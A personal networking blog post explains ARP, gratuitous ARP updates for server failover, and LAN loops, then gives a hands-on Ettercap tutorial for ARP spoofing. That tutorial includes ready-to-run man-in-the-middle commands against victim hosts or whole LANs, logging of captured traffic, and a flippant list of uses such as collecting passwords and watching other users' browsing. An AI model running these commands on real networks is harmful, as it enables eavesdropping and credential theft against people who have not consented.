Skip to main content

ARP, the mystery protocol that makes a LAN work

Address Resolution Protocol

Usually, ARP just works and most people are blissfully unaware of it, but once in a while, I run into a problem.

ARP is the mystery protocol that makes a LAN work.  When a host wants to talk to another host on a LAN, it sends out a Who Has w.x.y.z message and gets an I Am reply. After that the system knows how to talk to each other using their MAC addresses and the LAN switch knows how to route the packets between the two hosts. 

Fail Over of Servers

This is all very nice when you are running an ordinary LAN, but the wheels tend to fall off when you run a system with redundancy and fail over.

What happens in a fail over case, is that some devices will remember the old connection and will refuse to talk to the backup host, because while the backup host has the same IP address as the now defunct host, its MAC address is different. The entries in the ARP table can take a very long time to time out, more than 8 minutes in most Linux systems.

The solution is to force an ARP table update in hosts on the LAN, using the arping command:
$ arping -A -c 1 -I em0 192.168.111.1

The above example will send an unsolicited I Am reply to device 192.168.111.1 on the LAN. Read man arping for more details. (Some devices will respond to a request and some to an answer, so the best strategy is to send both to each device that you need to update, using the -U for one command and -A for the other.)

You can verify what is happening using tcpdump:
# tcpdump -lni em0 arp 

This is known as a gratuitous or unsolicited ARP to update a neighbour's cache.

Loops

Another problem arises when a backup system causes a LAN loop. 

Broadcasted ARP messages will get stuck in the loop and will clog up the LAN after a little while. The spanning tree protocol was devised to control ethernet switches and prevent loops, but in my experience it never works the way I want, so the best solution is to avoid making loops in the first place, rather than try to fix it using spanning tree.

ARP Poisoning

One of the myths surrounding a switched environment is that it prevents packet sniffing. It only makes it a little more awkward. Anyone can put their network card into promiscuous mode and capture packets between other hosts, by using ARP Spoofing. All you need is Ettercap.

ARP Cache

ARP is the Address Resolution Protocol. It is used to translate IP Addresses to MAC Addresses (Physical Address). A computer sends a query out to its broadcast domain asking who has a certain IP address. When the device at the IP address receives the packet it replies with its MAC Address and the requesting computer will log the response in its ARP cache. 

The ARP cache can be viewed by typing arp –a from the command-line:
Interface: 10.10.7.21 --- 0x5
Internet Address Physical Address Type
10.10.1.12 00-0b-cd-ef-2c-ff dynamic
10.10.1.13 00-0e-7f-ef-b5-8d dynamic

ARP Spoofing

How ARP Spoofing works is by an attacker PC sending out fake ARP responses to victim PC’s stating that they are someone else, the victim PC then updates their ARP cache to direct traffic to the attacker. The attacker will log, read, or modify the packets and then forward them to the destination.

This can be done using arping as discussed above, or one can use EttercapEttercap provides a GUI which can be launched from the command-line using ettercap –G or it can be run from the command-line entirely.

Basic Sniffing

To watch traffic passing by on the network use:
# ettercap –Tzq –i eth0

This will put ettercap into text mode, it will not ARP scan the network and will be quiet. Only interesting traffic will be displayed as it passes and it will listen on interface eth0 (or em1 or wlan0... use ifconfig to see what is available).

Man In The Middle Attack 

To sniff traffic between 2 hosts the attacker can run the following command from his Linux work station:
# ettercap -i eth0 –T –M arp /victim_ip_A/ /victim_ip_B/

The –i switch is telling ettercap to use a specific interface, in this case eth0, the –T switch is telling ettercap to use the Text interface and the –M switch is telling ettercap to use the Man-in-Middle-Mode (MITM).

Sniffing Multiple Hosts 

Multiple hosts can be sniffed with a command such as:
# ettercap –i eth0 –T –M arp /192.168.1.1 / /192.168.1.10-20/

If traffic to a certain port only, such as Telnet need to be captured the command would look like:
# ettercap –i eth0 –T –M arp /192.168.1.1 / /192.168.1.10-20/23

Sniffing All Hosts

To sniff traffic between all hosts on a small network:
# ettercap –T –M arp // //

Depending on the size of the network, this may cause dropped packets and performance issues and an angry IT person may eventually sneak up and hit you with an ugly stick.

Capabilitiess

  • Sniffing HTTPS
  • Collecting usernames and passwords
  • Injecting traffic
  • OS fingerprinting

Logging The Output

 To log the output of Ettercap you can use the following:
  • -L This will log both the packet detail (filename.ecp) and the info (filename.eci)
  • -l This will log only info (filename.eci)
  • -w Write output to a pcap file (viewable with Wireshark)

The syntax to log the output would be:
# ettercap –T –L filename –qM arp /ip_address_A/ /ip_address_B/

Other useful options:
  • -P use plugin (to view plugins use ettercap –TQ press p to view the plugin menu)
  • -c Compress the output (gzip)

Viewing The Output

The output from ettercap is a standard pcap file and can be viewed using etterlog, tcpdump, wireshark, or sent directly to the screen.

Using Ettercap for Fun and Profit

Ettercap can be used to perform MITM attacks and capture traffic between 2 hosts, just like the good folks at the NSA and GCHQ like to do.

Obviously this traffic can be parsed for useful information using grep.

You could run dsniff on the same PC and LAN card to run the traffic through that.

You could run driftnet to view any pictures that are passing the interface, or you could send the visited URL’s to your browser to see what other LAN users are doing and pretty soon, you will feel like a veritable Eddy Snowden.

Errata

Note that the ettercap syntax differs slightly from version to version.

To MITM someone you may need either:
# ettercap -i eth0 –T –M arp /victim_ip_A/ /victim_ip_B/
or
# ettercap -i eth0 –T –M arp /victim_ip_A/port/ /victim_ip_B/port/

or to MITM everybody:
# ettercap -i eth0 –T –M arp // //
or
# ettercap -i eth0 –T –M arp /// ///


Thanks to Mohammad Aamir, who spotted a mistake.

Have fun!

Herman

Comments

Popular posts from this blog

Parasitic Quadrifilar Helical Antenna

This article was reprinted in OSCAR News, March 2018:  http://www.amsat-uk.org If you want to receive Satellite Weather Pictures , then you need a decent antenna, otherwise you will receive more noise than picture. For polar orbit satellites, one needs an antenna with a mushroom shaped radiation pattern .  It needs to have strong gain towards the horizon where the satellites are distant, less gain upwards where they are close and as little as possible downwards, which would be wasted and a source of noise.  Most satellites are spin stabilized and therefore the antenna also needs circular polarization, otherwise the received signal will flutter as the antennas rotate through nulls. The helical antenna, first proposed by Kraus in 1948, is the natural solution to circular polarized satellite communications.  It is a simple twisted wire - there seems to be nothing to it.  Various papers have been published on helix antennas, so the operation is pretty well ...

Unlock CRA PDF Forms

Unlock Canada Revenue Agency PDF Forms It appears that there is a relatively new PDF feature to prevent casual copying and saving of a file and that some programs save PDF files with these foolish features active by default.  Many forms from the Canada Revenue Agency are locked in this way, which makes it difficult to do one's taxes, since one can fill the form, but cannot save it.  One can only print the form.  It should be possible to print to a file or export it to a new PDF file, but it is far better to reset the annoying anti-taxpayer flags, since the 'printed' form cannot be edited easily any more and I always manage to make a mistake or three that need to be corrected after review. If there is a Linux (virtual) machine handy, install qpdf and use it to reset the silly flags: $ su - password # dnf update # dnf install qpdf # exit $ qpdf --decrypt lockedfile.pdf unlockedfile.pdf One doesn't need a password to unlock these flags, so the fix is instant. La voila! He...

To C or not to C, That is the Question

As most would know, the Kernighan and Ritchie C Programming Language is an improved version of B, which is a simplified version of BCPL, which is derived from ALGOL, which is the Ur computer language that started the whole madness, when Adam needed an operating system for his Abacus, to count Eve's apples in the garden of Eden in Iraq.  The result is that C is my favourite, most hated computer language , which I use for everything. At university, I learned FORTRAN with punch cards on a Sperry-Univac, in order to run SPICE, to simulate an operational amplifier.  Computers rapidly lost their glamour after that era! Nobody taught me C.  I bought the book and figured it out myself. Over time, I wrote a couple of assemblers, a linker-locator, various low level debuggers and schedulers and I even fixed a bug in a C compiler - not because I wanted to, but because I had to, to get the job done!   Much of my software work was down in the weeds with DSP and radio modems...